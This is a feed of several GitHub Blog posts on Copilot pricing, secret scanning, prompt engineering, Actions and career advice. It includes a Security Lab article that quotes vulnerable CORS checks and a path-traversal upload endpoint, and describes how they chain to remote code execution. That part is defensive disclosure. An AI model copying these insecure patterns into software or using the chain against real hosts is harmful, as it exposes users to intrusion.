Already, GitHub is home to a massive and growing MCP ecosystem that you can discover and use today. Here is a great repository that acts as a community inventory with some of the best MCP servers to use. The GitHub local MCP server equips agent mode with compelling capabilities such as searching across repositories and code, managing issues and creating PRs ā€“ turning agent mode into a powerful user of the GitHub platform.

Get started by setting up local and remote MCP servers and using tools with agent mode in Visual Studio Code. To get started with the GitHub local MCP server, visit the repository, now supported natively in VS Code.

Premium model requests

Since GitHub Universe, we introduced a number of new models for chat, multi-file edits, and now agent mode. With the general availability of these models, we are introducing a new premium request type. Premium requests are in addition to the unlimited requests for agent mode, context-driven chat, and code completions in all paid plans for our base model (currently: OpenAI GPT-4o).

Customers with Copilot Pro will receive 300 monthly premium requests, beginning on May 5, 2025. Customers with Copilot Business and Copilot Enterprise will receive 300 and 1000 monthly premium requests respectively, starting between May 12 and May 19, 2025. Until then, use of these premium models is unlimited.

We are also introducing a new Pro+ plan for individuals with 1500 monthly premium requests and access to the best models, like GPT-4.5, for $39 per month.

Copilot paid users1 will also have the ability to pay-as-you-go for additional premium request usage. Individuals and organizations can choose to opt-in to use additional requests beyond their included amount, in addition to setting spending limits on requests to control costs with ease. GitHub Copilot Business and Enterprise administrators can manage requests via their Copilot Admin Billing Settings. Additional premium requests start at $0.04 per request.

Each premium model will consume a specific number of premium requests, allowing you to use a more powerful or efficient model when you need it, all while you have continued, unlimited access to Copilotā€™s base model.

Happy 50th birthday, Microsoft!

Today is also a hallmark moment in the history of technology: our mothership turns 50! From the creation of BASIC or MS-DOS, to the .NET Framework and VS Code, to the acquisition of GitHub ā€“ Microsoft has always been a developer company at heart. Half a century of dev love is no small feat. ā¤ļø

Now, with GitHub Copilot ā€“ what started out as a developer platform company is a platform where anyone can be a developer. Together, GitHub and Microsoft fully intend on enabling a world with 1 billion developers. šŸ—ŗļø

Here is Satya using agent mode to re-create MSFTā€™s first BASIC in a single shot. Let the vibes take you away, Mr. Nadella. šŸ•ŗ


  1. Option to purchase additional premium requests not available to users that subscribe or have subscribed to Pro or Pro+ through GitHub Mobile on iOS or Android. ā†©

The post Vibe coding with GitHub Copilot: Agent mode and MCP support rolling out to all VS Code users appeared first on The GitHub Blog.

April 3, 2025  16:00:24

At GitHub Security Lab, one of the most common vulnerability types we find relates to the cross-origin resource sharing (CORS) mechanism. CORS allows a server to instruct a browser to permit loading resources from specified origins other than its own, such as a different domain or port.

Many developers change their CORS rules because users want to connect to third party sites, such as payment or social media sites. However, developers often donā€™t fully understand the dangers of changing the same-origin policy, and they use unnecessarily broad rules or faulty logic to prevent users from filing further issues.

In this blog post, weā€™ll examine some case studies of how a broad or faulty CORS policy led to dangerous vulnerabilities in open source software. Weā€™ll also discuss DNS rebinding, an attack with similar effects to a CORS misconfiguration thatā€™s not as well known among developers.

What is CORS and how does it work?

CORS is a way to allow websites to communicate with each other directly by bypassing the same-origin policy, a security measure that restricts websites from making requests to a different domain than the one that served the web page. Understanding the Access-Control-Allow-Origin and Access-Control-Allow-Credentials response headers is crucial for correct and secure CORS implementation.

Access-Control-Allow-Origin is the list of origins that are allowed to make cross site requests and read the response from the webserver. If the Access-Control-Allow-Credentials header is set, the browser is also allowed to send credentials (cookies, http authentication) if the origin requests it. Some requests are considered simple requests and do not need a CORS header in order to be sent cross-site. This includes the GET, POST, and HEAD requests with content types restricted to application/x-www-form-urlencoded, multipart/form-data, and text/plain. When a third-party website needs access to account data from your website, adding a concise CORS policy is often one of the best ways to facilitate such communication.

To implement CORS, developers can either manually set the Access-Control-Allow-Origin header, or they can utilize a CORS framework, such as RSCors, that will do it for them. If you choose to use a framework, make sure to read the documentationā€”donā€™t assume the framework is safe by default. For example, if you tell the CORS library you choose to reflect all origins, does it send back the response with a blanket pattern matching star (*) or a response with the actual domain name (e.g., stripe.com)?

Alternatively, you can create a custom function or middleware that checks the origin to see whether or not to send the Access-Control-Allow-Origin header. The problem is, you can make some security mistakes when rolling your own code that well-known libraries usually mitigate.

Common mistakes when implementing CORS

For example, when comparing the origin header with the allowed list of domains, developers may use the string comparison function equivalents of startsWith, exactMatch, and endsWith functions for their language of choice. The safest function is exactMatch where the domain must match the allow list exactly. However, what if payment.stripe.com wants to make a request to our backend instead of stripe.com? To get around this, weā€™d have to add every subdomain to the allow list. This would inevitably cause users frustration when third-party websites change their APIs.

Alternatively, we can use the endsWith function. If we want connections from Stripe, letā€™s just add stripe.com to the allowlist and use endsWith to validate and call it a day. Not so fast, since the domain attackerstripe.com is now also valid. We can tell the user to only add full urls to the allowlist, such as https://stripe.com, but then we have the same problem as exactMatch.

We occasionally see developers using the startsWith function in order to validate domains. This also doesnā€™t work. If the allowlist includes https://stripe.com then we can just do https://stripe.com.attacker.com.

For any origin with subdomains, we must use .stripe.com (notice the extra period) in order to ensure that we are looking at a subdomain. If we combine exactMatch for second level domains and endsWith for subdomains, we can make a secure validator for cross site requests.

Lastly, thereā€™s one edge case found in CORS: the null origin should never be added to allowed domains. The null origin can be hardcoded into the code or added by the user to the allowlist, and itā€™s used when requests come from a file or from a privacy-sensitive context, such as a redirect. However, it can also come from a sandboxed iframe, which an attacker can include in their website. For more practice attacking a website with null origin, check out this CORS vulnerability with trusted null origin exercise in the Portswigger Security Academy.

How can attackers exploit a CORS misconfiguration?

CORS issues allow an attacker to make actions on behalf of the user when a web application uses cookies (with SameSite None) or HTTP basic authentication, since the browser must send those requests with the required authentication.

Fortunately for users, Chrome has defaulted cookies with no Samesite to SameSite Lax, which has made CORS misconfiguration useless in most scenarios. However, Firefox and Safari are still vulnerable to these issues using bypass techniques found by PTSecurity, whose research we highly recommend reading for knowing how someone can exploit CORS issues.

What impact can a CORS misconfiguration have?

CORS issues can give a user the power of an administrator of a web application, so the usefulness depends on the application. In many cases, administrators have the ability to execute scripts or binaries on the serverā€™s host. These relaxed security restrictions allow attackers to get remote code execution (RCE) capabilities on the server host by convincing administrators to visit an attacker-owned website.

CORS issues can also be chained with other vulnerabilities to increase their impact. Since an attacker now has the permissions of an administrator, they are able to access a broader range of services and activities, making it more likely theyā€™ll find something vulnerable. Attackers often focus on vulnerabilities that affect the host system, such as arbitrary file write or RCE.

Real-world examples

A CORS misconfiguration allows for RCE

Cognita is a Python project that allows users to test the retrieval-augmented generation (RAG) ability of LLM models. If we look at how it used to call the FastAPI CORS middleware, we can see it used an unsafe default setting, with allow_origins set to all and allow_credentials set to true. Usually if the browser receives Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true, the browser knows not to send credentials with the origin, since the application did not reflect the actual domain, just a wildcard.

app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

However, FastAPI CORS middleware is unsafe by default and setting these two headers like this resulted in the origin being reflected along with credentials.

Currently, Cognita does not have authentication, but if its developers implemented authentication without fixing the CORS policy, their authentication could be bypassed. As it stands, any website can send arbitrary requests to any endpoint in Cognita, as long as they know how to access it. Due to its lack of authentication, Cognita appears intended to be hosted on intranets or locally. An attacking website can try guessing the local IP of a Cognita instance by sending requests to local addresses such as localhost, or it can enumerate the internal IP address space by continually making requests until it finds the Cognita instance. With this bug alone, our access is limited to just using the RAG endpoints and possibly deleting data. We want to get a foothold in the network. Letā€™s look for a real primitive.

We found a simple arbitrary file write primitive; the developers added an endpoint for Docker without considering file sanitization, and now we can write to any file we want. The file.filename is controlled by the request and os.path.join resolves the ā€œ..ā€, allowing file_path to be fully controlled.

@router.post("/upload-to-local-directory")
async def upload_to_docker_directory(
    upload_name: str = Form(
        default_factory=lambda: str(uuid.uuid4()), regex=r"^[a-z][a-z0-9-]*$"
    ),
    files: List[UploadFile] = File(...),
):
...
        for file in files:
            logger.info(f"Copying file: {file.filename}, to folder: {folder_path}")
            file_path = os.path.join(folder_path, file.filename)
            with open(file_path, "wb") as f:
                f.write(file.file.read())

Now that we have an arbitrary file write target, what should we target to get RCE? This endpoint is for Docker users and the Cognita documentation only shows how to install via Docker. Letā€™s take a look at that Dockerfile.

command: -c "set -e; prisma db push --schema ./backend/database/schema.prisma && uvicorn --host 0.0.0.0 --port 8000 backend.server.app:app --reload"

Looking carefully, thereā€™s the --reload when starting up the backend server. So we can overwrite any file in the server and uvicorn will automatically restart the server to apply changes. Thanks uvicorn! Letā€™s target the init.py files that are run on start, and now we have RCE on the Cognita instance. We can use this to read data from Cognita, or use it as a starting point on the network and attempt to connect to other vulnerable devices from there.

Logic issues lead to credit card charges and backdoor access

Next, letā€™s look at some additional real life examples of faulty CORS logic.

We found the following code was found on the website https://tamagui.dev. Since the source code is found on GitHub, we decided to take a quick look. (Note: The found vulnerability has since been reported by our team and fixed by the developer.)

export function setupCors(req: NextApiRequest, res: NextApiResponse) {
  const origin = req.headers.origin

  if (
    typeof origin === 'string' &&
    (origin.endsWith('tamagui.dev') ||
      origin.endsWith('localhost:1421') ||
      origin.endsWith('stripe.com'))
  ) {
    res.setHeader('Access-Control-Allow-Origin', origin)
    res.setHeader('Access-Control-Allow-Credentials', 'true')
  }
}

As you can see, the developer added hardcoded endpoints. Taking a guess, the developer most likely used Stripe for payment, localhost for local development and tamagui.dev for subdomain access or to deal with https issues. In short, it looks like the developer added allowed domains as they became needed.

As we know, using endsWith is insufficient and an attacker may be able to create a domain that fulfills those qualities. Depending on the tamagui.dev accountā€™s permissions, an attacker could perform a range of actions on behalf of the user, such as potentially buying products on the website by charging their credit card.

Lastly, some projects donā€™t prioritize security and developers are simply writing the code to work. For example, the following project used the HasPrefix and Contains functions to check the origin, which is easily exploitable. Using this vulnerability, we can trick an administrator to click on a specific link (letā€™s say https://localhost.attacker.com), and use the user-add endpoint to install a backdoor account in the application.

func CorsFilter(ctx *context.Context) {
    origin := ctx.Input.Header(headerOrigin)
    originConf := conf.GetConfigString("origin")
    originHostname := getHostname(origin)
    host := removePort(ctx.Request.Host)

    if strings.HasPrefix(origin, "http://localhost") || strings.HasPrefix(origin, "https://localhost") || strings.HasPrefix(origin, "http://127.0.0.1") || strings.HasPrefix(origin, "http://casdoor-app") || strings.Contains(origin, ".chromiumapp.org") {
        setCorsHeaders(ctx, origin)
        return
    }

func setCorsHeaders(ctx *context.Context, origin string) {
    ctx.Output.Header(headerAllowOrigin, origin)
    ctx.Output.Header(headerAllowMethods, "POST, GET, OPTIONS, DELETE")
    ctx.Output.Header(headerAllowHeaders, "Content-Type, Authorization")
    ctx.Output.Header(headerAllowCredentials, "true")

    if ctx.Input.Method() == "OPTIONS" {
        ctx.ResponseWriter.WriteHeader(http.StatusOK)
    }
}

DNS rebinding

Diagram showing how DNS rebinding utilizes the DNS system to exploit vulnerable web applications.

DNS rebinding has the same mechanism as a CORS misconfiguration, but its ability is limited. DNS rebinding does not require a misconfiguration or bug on the part of the developer or user. Rather, itā€™s an attack on how the DNS system works.

Both CORS and DNS rebinding vulnerabilities facilitate requests to API endpoints from unintended origins. First, an attacker lures the victimā€™s browser to a domain that serves malicious javascript. The malicious javascript makes a request to a host that the attacker controls, and sets the DNS records to redirect the browser to a local address. With control over the resolving DNS server, the attacker can change the IP address of the domain and its subdomains in order to get the browser to connect to various IP addresses. The malicious javascript will scan for open connections and send their malicious payload requests to them.

This attack is very easy to set up using NCCGroupā€™s singularity tool. Under the payloads folder, you can view the scripts that interact with singularity and even add your own script to tell singularity how to send requests and respond.

Fortunately, DNS rebinding is very easy to mitigate as it cannot contain cookies, so adding simple authentication for all sensitive and critical endpoints will prevent this attack. Since the browser thinks it is contacting the attacker domain, it would send any cookies from the attacker domain, not those from the actual web application, and authorization would fail.

If you donā€™t want to add authentication for a simple application, then you should check that the host header matches an approved host name or a local name. Unfortunately, many newly created AI projects currently proliferating do not have any of these security protections built in, making any data on those web applications possibly retrievable and any vulnerability remotely exploitable.

   public boolean isValidHost(String host) {

        // Allow loopback IPv4 and IPv6 addresses, as well as localhost
        if (LOOPBACK_PATTERN.matcher(host).find()) {
            return true;
        }

        // Strip port from hostname - for IPv6 addresses, if
        // they end with a bracket, then there is no port
        int index = host.lastIndexOf(':');
        if (index > 0 && !host.endsWith("]")) {
            host = host.substring(0, index);
        }

        // Strip brackets from IPv6 addresses
        if (host.startsWith("[") && host.endsWith("]")) {
            host = host.substring(1, host.length() - 2);
        }

        // Allow only if stripped hostname matches expected hostname
        return expectedHost.equalsIgnoreCase(host);
    }

Because DNS rebinding requires certain parameters to be effective, it is not caught by security scanners for the fear of many false positives. At GitHub, our DNS rebinding reports to maintainers commonly go unfixed due to the unusual nature of this attack, and we see that only the most popular repos have checks in place.

When publishing software that holds security critical information or takes privileged actions, we strongly encourage developers to write code that checks that the origin header matches the host or an allowlist.

Conclusion

Using CORS to bypass the same-origin policy has always led to common mistakes. Finding and fixing these issues is relatively simple once you understand CORS mechanics. New and improving browser protections have mitigated some of the risk and may eliminate this bug class altogether in the future. Oftentimes, finding CORS issues is as simple as searching for ā€œCORSā€ or Access-Control-Allow-Origin in the code to see if any insecure presets or logic are used.

Check out the Mozilla Developer Network CORS page if you wish to become better acquainted with how CORS works and the config you choose when using a CORS framework.

If youā€™re building an application without authentication that utilizes critical functionality, remember to check the Host header as an extra security measure.

Finally, GitHub Code Security can help you secure your project by detecting and suggesting a fix for bugs such as CORS misconfiguration!

The post Localhost dangers: CORS and DNS rebinding appeared first on The GitHub Blog.

April 1, 2025  20:41:44

If you know where to look, exposed secrets are easy to find. Secrets are supposed to prevent unauthorized access, but in the wrong hands, they can beā€”and typically areā€”exploited in seconds.

To give you an idea of the scope of the problem, more than 39 million secrets were leaked across GitHub in 2024 alone.1 Every minute GitHub blocks several secrets with push protection.2 Still, secret leaks remain one of the most commonā€”and preventableā€”causes of security incidents. As we develop code faster than ever previously imaginable, weā€™re leaking secrets faster than ever, too.

Thatā€™s why, at GitHub, weā€™re working to prevent breaches caused by leaked tokens, credentials, and other secretsā€”ensuring protection against secret exposures is built-in and accessible to every developer.

Today, weā€™re launching the next evolution of GitHub Advanced Security, aligning with our ongoing mission to keep your secretsā€¦secret.

  • Secret Protection and Code Security, now available as standalone products
  • Advanced Security for GitHub Team organizations
  • A free, organization-wide secret scan to help teams identify and reduce exposure.3

Hereā€™s how secrets leak, what weā€™re doing to stop it, and what you can do to protect your code. Letā€™s jump in.

How do secret leaks happen?

Most software today depends on secretsā€”credentials, API keys, tokensā€”that developers handle dozens of times a day. These secrets are often accidentally exposed. Less intuitively, a large number of breaches come from well-meaning developers who purposely expose a secret. Developers also often underestimate the risk of private exposures, committing, sharing, or storing these secrets in ways that feel convenient in the moment, but which introduce risk over time.

Unfortunately, these seemingly innocuous secret exposures are small threads to pull for an attacker looking to unravel a whole system. Bad actors are extremely skilled at using a foothold provided by ā€œlow riskā€ secrets for lateral movement to higher-value assets. Even without the risk of insider threats, persisting any secret in git history (or elsewhere) makes us vulnerable to future mistakes. Research shows that accidental mistakes (like inadvertently making a repository public) were higher in 2024 than ever before.

If youā€™re interested in learning more about secret leaks and how to protect yourself, check out this great video from my colleague Chris Reddington:

What is GitHub doing about it?

We care deeply about protecting the developer community from the risk of exposed secrets. A few years ago, we formally launched our industry partnership program, which has now grown to hundreds of token issuers like AWS, Google Cloud Platform, Meta, and OpenAIā€”all fully committed to protecting the developer community from leaked secrets.

Last year, we rolled out push protection by default for public repositories, which has since blocked millions of secrets for the open source community.

And finally, as of today, weā€™re rolling out additional changes to our feature availability, aligning with our ongoing goal to help organizations of all sizes protect themselves from the risk of exposed secrets: a new point-in-time scan, free for organizations; a new pricing plan, to make our paid security tooling more affordable; and the release of Secret Protection and Code Security to GitHub Team plans.

What you can do to protect yourself from exposed secrets

GitHub push protection helps prevent secret leaks before they happen.

The easiest way to protect yourself from leaked secrets is not to have any in the first place. Push protection, our built-in solution, is the simplest way to block secrets from accidental exposure. It leverages the same detectors that we created through our partnership program with cloud providers, ensuring secrets are caught quickly and accurately with the lowest rate of false positives possible.

Studies have shown that GitHub Secret Protection is the only secret scanning toolā€”proprietary or open sourceā€”that can claim an over one in two true positive rate across all findings4. GitHub received a precision score of 75% (compared to the next best, 46% precision). Compared to alternatives like open source scanning solutions, itā€™s not that GitHub is finding fewer secretsā€¦ itā€™s that weā€™re finding real ones. That way, youā€™re able to spend your time worrying less about false positives, and more about what mattersā€“shipping.

Long-lived credentials are some of the most common and dangerous types of secrets to leak, as they often persist unnoticed for monthsā€“or yearsā€“and give bad actors extended access. Thatā€™s why managing secrets through their full lifecycle is critical.

Beyond push protection, you can protect yourself from leaks by following security best practices to ensure secrets are securely managed from creation to revocation:

  • Creation: follow the principle of least privilege and make sure secrets are securely generated.
  • Rotation: outside of user credentials, secrets should be regularly rotated.
  • Revocation: restrict access when no longer neededā€“or when compromised.

Throughout the lifecycle of a secret, you should eliminate human interaction and automate secret management whenever possible.

In addition, you should adopt a continuous monitoring solution for detecting exposures, so you can react quickly. Like push protection, GitHubā€™s built-in solution for secret scanning is the simplest way to triage previously leaked secrets.

Starting today, investing in GitHubā€™s built-in security tooling is more affordable and in reach for many teams with the release of GitHub Secret Protection (free for public repositories), in addition to a new point-in-time scan (free for all organization repositories), which can be run periodically to check for exposed secrets.

Learn more about deploying and managing secret protection at scale:

GitHub Secret Protection and GitHub Code Security

Introducing GitHub Secret Protection and GitHub Code Security

As of today, our security products are available to purchase as standalone products for enterprises, enabling development teams to scale security quickly. Previously, investing in secret scanning and push protection required purchasing a larger suite of security tools, which made fully investing unaffordable for many organizations. This change ensures scalable security with Secret Protection and Code Security is no longer out of reach for many organizations.

GitHub Secret Protection is here for GitHub Team organizations to purchase

In addition, as of today, our standalone security products are also available as add-ons for GitHub Team organizations. Previously, smaller development teams were unable to purchase our security features without upgrading to GitHub Enterprise. This change ensures our security products remain affordable, accessible, and easy to deploy for organizations of all sizes.

Have your secrets been exposed? Try our new public preview

The secret risk assessment is available for GitHub organizations

Understanding whether you have existing exposed secrets is a critical step. Starting today, you can run a secret risk assessment for your organization.

The secret risk assessment is a point-in-time scan leveraging our scanning engine for organizations, covering all repositoriesā€“public, private, internal, and even archivedā€“and can be run without purchase. The point-in-time scan provides clear insights into the exposure of your secrets across your organization, along with actionable steps to strengthen your security and protect your code. In order to lower barriers for organizations to use and benefit from the feature, no specific secrets are stored or shared.

The public preview is releasing today for organizations across GitHub Team and Enterprise plans to try. Itā€™s still quite early, so weā€™d love to hear your feedback, like whether additional guidance on next steps would be helpful, or whether this is something youā€™d leverage outside of Team and Enterprise plans.

If you have feedback or questions, please do join the discussion in GitHub Communityā€“weā€™re listening.

 

Learn more about GitHub Advanced Security, including Secret Protection and Code Security.

Notes


  1. State of the Octoverse, 2024 ā†©
  2. Push protection helps prevent secret leaksā€“without compromising the developer experienceā€“by scanning for secrets before they are pushed. Learn more about push protectionā†©
  3. The secret risk assessment is a free tool which will provide clear insights into secret exposure across your organization, along with actionable steps to strengthen their security and protect their code. Learn more about the secret risk assessmentā†©
  4. A Comparative Study of Software Secrets Reporting by Secret Detection Tools, Setu Kumar Basak et al., North Carolina State University, 2023 ā†©

The post GitHub found 39M secret leaks in 2024. Hereā€™s what weā€™re doing to help appeared first on The GitHub Blog.

March 31, 2025  13:00:32

Welcome back to season two of GitHub for Beginners, a series designed to help you navigate GitHub more confidently! So far, weā€™ve explored how to use GitHub Copilot and some of its essential features. Today, we will be learning all about large language models (LLMs) and the basics of prompt engineering.

LLMs are powerful, and the way we interact with them via prompts matters. For example, have you ever tried asking an LLM a question, but it canā€™t really figure out what youā€™re trying to ask? Understanding the power of prompts (and the limitations that come with them) can help you become even more productive.

In this post, weā€™ll explore:

  • How LLMs work and how prompts are processed.
  • How to engineer the most effective prompts.
  • How to troubleshoot prompts when we donā€™t get the outcomes we want.

Letā€™s get started!

Whatā€™s an LLM?

Large language models are a type of AI that are trained on a large (hence the name) amount of text data to understand and generate human-like language.

By predicting the next word in a sentence based on the context of the words that came before it, LLMs respond to humans in a way that is relevant and coherent. Sort of like an ultra-smart autocomplete!

This image shows the process of using an LLM: entering prompt text, LLM analysis, and then receiving a response.

When it comes to using LLMs, there are three important things to understand:

  • Context: This is the surrounding information that helps an LLM understand what youā€™re talking about. Just like when you have a conversation with a friend, the more context you offer, the more likely the conversation will make sense.

This image shows a visual example of what itā€™s like to gain context within a text message thread between two friends, and then a flow chart showing how the conversation went from no context at all to achieving full context.

  • Tokens: For LLMs, text is broken down into units of tokens. This could be a word, part of a word, or even just one single letter. AI models process tokens to generate responses, so the number of tokens you use with an LLM can impact its response. Too few tokens can lead to a lack of context, but too many could overwhelm the AI model or run into its built-in token limits.

This image is a visual representation of how a rare word like ā€œSupercalifragilisticexpialidociousā€ would be broken down into six smaller, more common tokens, or subword pieces.

  • Limitations: LLMs are powerful, but not all-powerful. Instead of understanding language like humans, LLMs rely on patterns and probabilities from training data. Taking a deeper dive into training data is beyond the scope of this post, but as a general rule, the ideal data set is diverse and broad. Models are never perfectā€”sometimes they can hallucinate, provide incorrect answers, or give nonsensical responses.

This image depicts how common sense reasoning plays into prompting LLMs. It explores a prompt, shares how humans and LLMs would each understand the prompt, and shares a potential hallucination.

What is a prompt?

A prompt is a natural language request that asks an LLM to perform a specific task or action. A prompt gives the model context via tokens, and works around the modelā€™s potential limitations, so that the model can give you a response. For example, if you prompt an LLM with ā€œWrite a JavaScript function to calculate the factorial of a number,ā€ it will use its training data to give you a function that accomplishes that task.

This image shares four steps in which an LLM might process your prompt. The four steps are: input prompt, tokenization, processing, and response generation.

Depending on how a specific model was trained, it might process your prompt differently, and present different code. Even the same model can produce different outputs. These models are nondeterministic, which means you can prompt it the same way three times and get three different results. This is why you may receive different outputs from various models out in the world, like OpenAIā€™s GPT, Anthropicā€™s Claude, and Googleā€™s Gemini.

Now that we know what a prompt is, how do we use prompts to get the outputs we want?

What is prompt engineering?

Imagine that a friend is helping you complete a task. Itā€™s important to give them clear and concise instructions if thereā€™s a specific way the task needs to be done. The same is true for LLMs: a well-crafted prompt can help the model understand and deliver exactly what youā€™re looking for. The act of crafting these prompts is prompt engineering.

Thatā€™s why crafting the right prompt is so important: when this is done well, prompt engineering can drastically improve the quality and relevance of the outputs you get from an LLM.

Here are a few key components of effective prompting:

  • An effective prompt is clear and precise, because ambiguity can confuse the model.
  • Itā€™s also important to provide enough context, but not too much detail, since this can overwhelm the LLM.
  • If you donā€™t get the answer youā€™re expecting, donā€™t forget to iterate and refine your prompts!

Letā€™s try it out!

Example: How to refine prompts to be more effective
Imagine youā€™re using GitHub Copilot and say: Write a function that will square numbers in a list in a new file with no prior code to offer Copilot context. At first, this seems like a straightforward and effective prompt. But there are a lot of factors that arenā€™t clear:

  • What language should the function be written in?
  • Do you want to include negative numbers?
  • Will the input ever have non-numbers?
  • Should it affect the given list or return a new list?

How could we refine this prompt to be more effective? Letā€™s change it to: Write a Python function that takes a list of integers and returns a new list where each number is squared, excluding any negative numbers.

This new prompt is clear and specific about what language we want to use, what the function should do, what constraints there are, and the expected input type. When we give GitHub Copilot more context, the output will be better aligned with what we want from it!

This image consists of white text on a black background sharing that prompt engineering is the same thing as being a good communicator.

Just like coding, prompt engineering is about effective communication. By crafting your prompts thoughtfully, you can more effectively use tools like GitHub Copilot to make your workflows smoother and more efficient. That being said, working with LLMs means there will still be some instances that call for a bit of troubleshooting.

How to improve results when prompting LLMs

As you continue working with GitHub Copilot and other LLM tools, you may occasionally not get the output you want. Oftentimes, itā€™s because your initial prompt wasnā€™t specific enough. Here are a few scenarios you might run into when prompting LLMs.

Prompt confusion

Itā€™s easy to mix multiple requests or be unclear when writing prompts, which can confuse the model youā€™re using. Say you highlight something in Visual Studio Code and tell Copilot fix the errors in this code and optimize it. Is the AI supposed to fix the errors or optimize it first? For that matter, what is it supposed to optimize for? Speed, memory, or readability?

This image depicts how to overcome prompt confusion, or mixing multiple requests or unclear instructions. First, youā€™d fix errors, then optimize code, and finally add tests.

To solve this, you need to break your prompt down into concrete steps with context. We can adjust this prompt by separating our asks: First, fix the errors in the code snippet. Then, optimize the fixed code for better performance. Building a prompt iteratively makes it more likely that youā€™ll get the result you want because the specific steps the model needs to take are more clear.

Token limitations

Remember, tokens are units of words or partial words that a model can handle. But thereā€™s a limit to how many tokens a given model can handle at once (this varies by model, tooā€”and there are different models available with GitHub Copilot). If your prompt is too long or the expected output is very extensive, the LLM may hallucinate, give a partial response, or just fail entirely.

This image depicts how to overcome token limitations, since LLMs have a maximum token limit for input and output. You would need to break down large inputs into smaller chunks.

That means you want to keep your prompts concise. Again, itā€™s important to iterate on smaller sections of your prompt, but itā€™s also crucial to only provide necessary context. Does the LLM actually need an entire code file to return your desired output, or would just a few lines of code in a certain function do the trick? Instead of asking it to generate an entire application, can you ask it to make each component step-by-step?

Assumption errors

Itā€™s easy to assume that the LLM knows more than it actually does. If you say add authentication to my app, does the model know what your app does? Does it know which technologies you may want to use for authentication?

This image depicts how to overcome assumption errors, or when you assume LLM has context it doesnā€™t have. Youā€™d need to explicitly state requirements, outline specific needs, mention best practices if needed, and then iterate with edge cases and restraints.

When crafting a prompt like this, youā€™ll need to explicitly state your requirements. This can be done by outlining specific needs, mentioning best practices if you have any, and once again, iterating with edge cases and restraints. By stating your requirements, youā€™ll help ensure the LLM doesnā€™t overlook critical aspects of your request when it generates the output.

Prompt engineering best practices

Prompt engineering can be tricky to get the hang of, but youā€™ll get better the more you do it. Here are some best practices to remember when working with GitHub Copilot or any other LLM:

  • Give the model enough context while considering any limitations it might have.
  • Prompts should be clear, concise, and precise for the best results.
  • If you need multiple tasks completed, break down your prompts into smaller chunks and iterate from there.
  • Be specific about your requirements and needs, so that the model accurately understands the constraints surrounding your prompt.

Your next steps

We covered quite a bit when it comes to prompt engineering. We went over what LLMs are and why context is important, defined prompt engineering and crafting effective prompts, and learned how to avoid common pitfalls when working with large language models.

  • If you want to watch this demo in action, weā€™ve created a YouTube tutorial that accompanies this blog.
  • If you have any questions, pop them in the GitHub Community thread and weā€™ll be sure to respond.
  • Remember to sign up for GitHub Copilot (if you havenā€™t already) to get started for free.
  • Join us for the next part of the series where weā€™ll walk through security best practices.

Happy coding!

Looking to learn more about GitHub Copilot?
Try GitHub Copilot for free or read more about Copilot.

The post GitHub for Beginners: How to get LLMs to do what you want appeared first on The GitHub Blog.

March 27, 2025  16:00:46

Maintaining and contributing to open source projects can be rewardingā€”but it comes with a lot of small, repetitive tasks. The good news? GitHub Actions can automate the more tedious and error-prone parts of maintainership, freeing you up to focus on what matters: building and growing your community. Whether youā€™ve just launched your project or youā€™re looking to scale, here are a few of the most helpful actions to help you along your way.

Pro tip: Itā€™s best practice to audit the source code of any action you use, and pin actions to a full length commit SHA so that you always know what version of the code youā€™re using.

Now, letā€™s get started.

1. Clean up your backlog with stale

Managing issues or pull requests can be challenging, especially when users open issues that require additional information to resolve. If they donā€™t respond with what you need, these issues can pile up and make your backlog look daunting. Stale closes any issues or pull requests that lack activity after a set number of days, keeping your open issues list nice and tidy.

šŸ‘‰ Who uses it: DeepSeek-R1, opentelemetry-go, and more.

2. Let super-linter sweat the small stuff for you

Itā€™s awesome when someone takes the time to submit a pull request to your project. Itā€™s not so awesome when you have to manually reject that pull request because of a small mistake. A linter is a tool that helps you enforce best practices and consistent formatting. Super-linter is a collection of linters for a variety of languages that can automate many of the chores associated with code reviews, including enforcing style guidelines, detecting syntax errors, identifying security vulnerabilities, and ensuring code consistency across multiple languages.

šŸ‘‰ Who uses it: Barman, frankenphp, and more.

3. Stop repeating yourself with create-or-update-comment

Repetitive comments for common scenarios can become tedious. Create-or-update-comment offers a reprieve, enabling you to automate tasks, like sending welcome messages to new contributors or providing standardized feedback when linters and other automated processes detect problems.

šŸ‘‰ Who uses it: woocommerce, lucide, and more.

4. Create release notes with ease with Release Drafter

After all the merging, testing, and other work that goes into preparing a release, writing up the release notes is often the last thing you want to do. The good news: Release Drafter automates the process for you. Each time you merge a pull request, it updates a draft text of your release notes, so theyā€™ll be ready when itā€™s time to publish.

šŸ‘‰ Who uses it: LightGBM, Mealie, and more.

5. Stay organized with pull request labeler

Overwhelmed with PRs? Pull request labeler automatically labels pull requests based on the files or branch modified, helping you triage work and maintain a consistent labeling system.

šŸ‘‰ Who uses it: Apache Lucene, Marvin, and more.

Maintaining an open source project is a labor of love, but with the right tools, it doesnā€™t have to feel overwhelming. These actions are just a few examples of how automation can save time, reduce frustration, and help you focus on writing great code and growing your community.

Why not give them a try and see how they can transform your open source journey? Your future self (and your contributors) will thank you!

Find more actions on GitHub Marketplace.

The post 5 GitHub Actions every maintainer needs to know appeared first on The GitHub Blog.

March 27, 2025  18:31:39

One-on-one meetings with your manager are one of the most valuable tools you have for career growth, problem-solving, and unlocking new opportunities. So if youā€™re only using them to provide status updates, youā€™re leaving a lot on the table.

I didnā€™t fully realize this potential until I mentioned in a one-on-one that I was interested in mentorship and growing my leadership skills. Not long after, I was asked to co-lead a project with an intern to build an internal tool that helped surface enterprise configuration details. This gave me the opportunity to take technical ownership on a project while mentoring someone in a real-world contextā€”both of which pushed me outside my comfort zone in the best way. That experience made it clear: When used intentionally, one-on-ones can open doors you didnā€™t even know were there.

Many engineers treat one-on-ones as a low-stakes standup: reporting work, mentioning blockers, and getting general feedback. While that can be useful, it barely scratches the surface of what these meetings can accomplish. Instead, think of them as a system design review for your roleā€”a time to debug challenges, optimize your workflow, and align on long-term career goals.

Reframing your perception of what a one-on-one can accomplish

A well-structured one-on-one meeting with your manager isnā€™t just a check-in, itā€™s an opportunity to shape your work environment and career trajectory. You wouldnā€™t build a system without evaluating its constraints, dependencies, and long-term maintainability. Why approach your career any differently?

Start by shifting your mindset: These meetings are not status updates. Your manager already sees your pull requests, sprint velocity, and planning docs. Instead, use this time to highlight what mattersā€”what youā€™ve shipped, the value itā€™s delivered, and where the friction is.

